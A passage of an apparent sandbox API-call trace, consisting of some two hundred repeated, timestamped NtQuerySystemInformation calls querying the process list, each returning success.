SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.473] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.474] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.478] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.478] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.479] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.480] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.480] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.481] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.481] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.482] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.482] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.483] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.483] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.483] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.484] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.484] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.491] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.491] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.492] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.492] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.493] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.493] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.493] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.494] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.494] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.495] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.495] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.496] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.496] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.497] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.501] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.501] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.502] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.502] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.503] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.503] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.504] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.505] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.505] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.506] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.507] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.507] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.508] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.508] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.515] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.516] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.516] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.517] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.517] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.518] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.518] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.518] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.519] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.519] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.520] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.520] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.521] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.521] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.521] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.527] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.528] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.528] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.529] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.529] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.529] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.530] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.530] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.531] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.531] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.532] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.532] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.533] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.533] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.539] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.540] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.540] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.541] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.541] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.542] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.542] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.543] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.544] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.544] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.545] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.545] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.546] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.546] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.550] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.551] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.551] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.552] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.552] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.553] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.553] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.553] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.554] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.554] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.555] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.555] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.556] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.556] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.581] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe970) returned 0x0 [0224.582] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe970) returned 0x0 [0224.582] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe970) returned 0x0 [0224.583] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe970) returned 0x0 [0224.583] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe970) returned 0x0 [0224.584] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe970) returned 0x0 [0224.584] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe970) returned 0x0 [0224.584] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe970) returned 0x0 [0224.585] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe970) returned 0x0 [0224.585] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe970) returned 0x0 [0224.586] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe970) returned 0x0 [0224.586] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe970) returned 0x0 [0224.587] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe970) returned 0x0 [0224.587] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe970) returned 0x0 [0224.591] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe970) returned 0x0 [0224.591] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe970) returned 0x0 [0224.592] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe970) returned 0x0 [0224.592] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe970) returned 0x0 [0224.593] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe970) returned 0x0 [0224.593] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe970) returned 0x0 [0224.593] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe970) returned 0x0 [0224.594] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe970) returned 0x0 [0224.594] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe970) returned 0x0 [0224.595] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe970) returned 0x0 [0224.595] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe970) returned 0x0 [0224.596] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe970) returned 0x0 [0224.596] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe970) returned 0x0 [0224.596] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe970) returned 0x0 [0224.597] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe970) returned 0x0 [0224.602] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe970) returned 0x0 [0224.603] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe970) returned 0x0 [0224.603] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe970) returned 0x0 [0224.603] 